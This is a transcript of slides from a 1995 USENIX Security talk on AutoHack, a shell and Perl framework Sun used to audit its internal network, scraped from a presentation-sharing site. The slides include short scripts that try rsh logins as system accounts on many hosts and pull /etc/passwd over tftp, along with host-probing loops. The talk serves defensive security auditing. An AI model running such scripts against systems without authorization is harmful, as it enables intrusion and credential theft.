wan hacking with autohack auditing security behind the
play

WAN HACKING with AutoHack - auditing security behind the firewall - PowerPoint PPT Presentation

WAN-Hacking with AutoHack - Alec Muffett, USENIX Security Symposium 95 WAN HACKING with AutoHack - auditing security behind the firewall Alec Muffett Network Security Group Sun Microsystems Alec.Muffett@UK.Sun.COM alec@hicom.org


  1. WAN-Hacking with AutoHack - Alec Muffett, USENIX Security Symposium ’95 WAN HACKING with AutoHack - auditing security behind the firewall Alec Muffett Network Security Group Sun Microsystems Alec.Muffett@UK.Sun.COM alec@hicom.org

  2. WAN-Hacking with AutoHack - Alec Muffett, USENIX Security Symposium ’95 30,000 Hosts 1,200 Subnets Security People 6 3000 lines of perl/sh

  3. WAN-Hacking with AutoHack - Alec Muffett, USENIX Security Symposium ’95 #!/bin/sh while read host do for user in root daemon bin sys smtp adm do su $user -c "rsh -n $host ’echo $host-$user’" done done AutoHack v0.1

  4. WAN-Hacking with AutoHack - Alec Muffett, USENIX Security Symposium ’95 #!/bin/sh while read host do ping $host 1 >/dev/null 2>&1 || continue echo $host done A simple version of "testaddr"

  5. WAN-Hacking with AutoHack - Alec Muffett, USENIX Security Symposium ’95 #!/bin/sh while read host do bin=database/$host test -d $bin || mkdir $bin || exit 1 for module in modules/attack.* do log=‘basename $module‘ $module $host > $bin/$log done done A simple version of "engine"

  6. WAN-Hacking with AutoHack - Alec Muffett, USENIX Security Symposium ’95 #!/bin/sh host=$1 tf=/tmp/tftpw$$ timeout 60 tftp <<EOT >/dev/null 2>&1 connect $host mode binary rexmt 15 timeout 30 get /etc/passwd $tf quit EOT test -s $tf && cat $tf rm -f $tf A simple version of "attack.tftp"

  7. WAN-Hacking with AutoHack - Alec Muffett, USENIX Security Symposium ’95 (background) attack engine a) AutoHack testaddr module attack genaddr sortaddr uniqaddr avoidaddr mux testaddr engine module attack testaddr engine module sortaddr genaddr uniqaddr reportaddr report.writer database b) HackReport report Overview of AutoHack v5.8

  8. WAN-Hacking with AutoHack - Alec Muffett, USENIX Security Symposium ’95 ALL YOU NEED IS A FRAMEWORK

  9. WAN-Hacking with AutoHack - Alec Muffett, USENIX Security Symposium ’95 # http probe library lib.banter tcp 123.69.42.7:80 # send an illegal command, log response psend BOING call flush_input quit Banter code for probing HTTP daemons

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend


More recommend